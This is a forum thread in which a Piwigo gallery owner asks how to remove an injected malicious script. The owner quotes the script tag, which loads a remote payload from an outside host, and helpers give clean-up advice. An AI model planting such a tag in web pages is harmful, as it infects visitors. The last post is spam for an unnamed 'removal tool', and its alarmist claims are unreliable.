I am told I have malicious script inserted into the source code of my piwigo. I've gone through google webmaster tools and it tells me the code is this:
<script src="http://nman54appl.rr.nu/nl.php?p=d">
I google that code and confirm it's a trojan but I don't know how to get rid of it without losing data. Can I just reload piwigo? I've considered going into the piwigo and seeing if I can reload the source code but I can't go to the page without being subjected to malicious code.
thanks
Kozmo
Offline
download Piwigo archive corresponding to your version and overwrite all files with new ones
do the same for each plugins and themes if needed
also, clear the two folders _data/templates_c and _data/combined
Offline
You should find the reason of the Contamination and see what files are changed. For example, at the most time the index.php is changed.
For the reload, you can try it with the download version (not the netinstall version) and uploading it via ftp to your webspace. But do this only as the second step. First look at the files. Additionally, you should change ALL passwords and make them secure.
Offline
thanks for the help; a couple of followup questions.
First, how do I tell what version I have. I think I'm up to date but not totally sure; I've noticed extension updates recently (and updated them) but haven't seen any Piwigo updates in the last weeks. I can't go into the program to find the version. Is there something in one of the program files that will tell me the version.
Second, if I replace all the files, will my setup and data be left intact?
Offline
the version is defined in the constant PHPWG_VERSION in the file include/constants.inc.php
no it won't overwrite your data, otherwise I wouldn't recommend you to do it !
Offline
Hello Everyone!! Are you getting infected with Trojan. it will silently sneaks into your computer and will ruin your PC performance. it will easily get inside in your computer and will stole all your important data , and put your system into vulnerable condition. its high time to remove this harmful Trojan infection, with the help of Automatic Removal Tool, as detected over your system. so, for further info, you should visit:-